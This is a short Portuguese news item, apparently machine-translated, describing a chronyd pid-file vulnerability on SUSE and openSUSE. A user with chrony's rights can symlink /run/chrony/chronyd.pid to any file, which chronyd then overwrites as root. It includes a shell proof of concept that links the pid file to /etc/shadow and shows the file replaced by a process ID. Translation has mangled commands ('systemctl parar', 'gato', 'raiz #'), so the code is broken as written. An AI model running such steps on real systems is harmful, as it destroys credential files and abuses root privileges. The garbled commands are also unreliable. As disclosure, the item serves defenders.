В
A vulnerabilidade é causada pela criação insegura de um arquivo pid, que foi criado em um estágio em que o chrony ainda não havia redefinido os privilégios e estava sendo executado como root. Neste caso, o diretório /run/chrony, no qual o arquivo pid está escrito, foi criado com direitos 0750 via systemd-tmpfiles ou quando o chronyd foi lançado em associação com o usuário e grupo “chrony”. Assim, caso você tenha acesso ao usuário chrony, é possível substituir o arquivo pid /run/chrony/chronyd.pid por um link simbólico. Um link simbólico pode apontar para qualquer arquivo do sistema que será substituído quando o chronyd for iniciado.
root # systemctl parar chronyd.service
root# sudo -u chrony /bin/bash
chrony$ cd /run/chrony
chrony$ ln -s /etc/shadow chronyd.pid
saída do chrony$
raiz # /usr/sbin/chronyd -n
^C
# em vez do conteúdo de /etc/shadow o ID do processo chronyd será salvo
raiz # gato /etc/shadow
15287
Vulnerabilidade
Problema SUSE e openSUSE
Fonte: opennet.ru